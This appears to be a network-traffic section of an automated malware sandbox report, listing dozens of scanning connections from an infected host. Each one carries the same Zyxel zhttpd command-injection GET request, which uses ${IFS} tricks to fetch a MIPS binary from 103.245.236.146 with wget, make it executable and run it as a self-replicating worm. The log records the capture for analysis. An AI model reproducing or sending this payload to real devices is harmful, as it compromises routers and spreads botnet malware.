                                                Jan 28, 2024 10:16:26.831935883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4775192.168.2.233505038.181.161.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831969976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4776192.168.2.2343782163.92.100.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832015991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4777192.168.2.233645495.4.241.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832040071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4778192.168.2.233578248.48.247.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832061052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4779192.168.2.2351020187.139.151.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832109928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4780192.168.2.233839441.177.65.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832144976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4781192.168.2.233589820.72.240.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832144976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4782192.168.2.2333148146.69.20.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832180977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4783192.168.2.2339580169.149.212.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832201958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4784192.168.2.2337976108.15.73.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832242012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4785192.168.2.235891612.29.107.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832268000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4786192.168.2.234569818.254.211.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832288980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4787192.168.2.2342716121.66.19.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832323074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4788192.168.2.2342362125.155.44.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832336903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4789192.168.2.233458466.139.52.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832360983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4790192.168.2.2360932121.20.33.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832412004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4791192.168.2.233969476.167.171.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832437992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4792192.168.2.2357242113.207.241.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832483053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4793192.168.2.2360846113.140.160.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832483053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4794192.168.2.233669490.126.128.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832540035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4795192.168.2.2356734100.138.50.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832571983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4796192.168.2.2350484136.201.226.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832616091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4797192.168.2.2333398204.45.157.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832622051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4798192.168.2.2336686125.245.7.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832643032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4799192.168.2.234633482.106.47.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832690954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4800192.168.2.2356702183.1.55.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832712889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4801192.168.2.2338992207.244.39.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832727909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4802192.168.2.2338898106.201.178.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832781076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4803192.168.2.233943846.180.79.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832781076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4804192.168.2.2347268129.164.24.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832824945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4805192.168.2.2334266111.190.127.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832855940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4806192.168.2.2334566147.33.172.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832873106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4807192.168.2.2358720200.80.33.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832910061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4808192.168.2.233708843.7.214.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832932949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4809192.168.2.2334148121.152.219.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832951069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4810192.168.2.233980295.94.71.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832979918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4811192.168.2.234203854.23.183.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.832998037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4812192.168.2.2337610117.82.206.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833041906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4813192.168.2.235639293.188.194.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833095074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4814192.168.2.235272652.248.173.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833126068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4815192.168.2.2334594123.138.172.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833126068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4816192.168.2.234962268.176.209.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833142996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4817192.168.2.2340006116.6.114.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833162069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4818192.168.2.235725813.47.90.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833205938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4819192.168.2.2357492147.224.118.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833226919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4820192.168.2.235631623.106.243.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833250046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4821192.168.2.2336364189.83.141.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833287954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4822192.168.2.2347400199.99.30.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833292007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4823192.168.2.2359016190.127.44.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833323002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4824192.168.2.2357472178.243.253.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833352089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4825192.168.2.235770413.133.38.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833353043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4826192.168.2.2345610209.202.94.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833372116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4827192.168.2.2360390166.228.247.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833426952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4828192.168.2.2345040147.196.196.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833450079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4829192.168.2.2350128222.111.253.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833477020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4830192.168.2.23514269.207.145.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833520889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4831192.168.2.2334260163.231.146.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833540916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4832192.168.2.233696449.81.186.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833565950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4833192.168.2.2333008203.16.248.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833615065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4834192.168.2.2347292191.118.70.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833636045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4835192.168.2.233743664.137.64.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833676100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4836192.168.2.23521882.157.206.198443
                                                TimestampBytes transferredDirectionData
